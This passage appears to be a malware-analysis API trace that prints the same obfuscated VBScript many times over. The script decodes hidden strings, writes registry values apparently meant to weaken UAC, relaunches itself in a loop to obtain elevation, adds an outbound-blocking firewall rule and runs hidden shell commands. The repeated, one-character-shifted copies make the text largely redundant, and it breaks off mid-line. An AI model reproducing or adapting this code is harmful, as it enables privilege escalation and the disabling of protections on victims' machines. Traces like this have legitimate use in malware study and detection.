bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.032] wcsncmp (_String1="ewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.033] wcsncmp (_String1="wRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.033] wcsncmp (_String1="Rule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.033] wcsncmp (_String1="ule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.033] wcsncmp (_String1="le.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 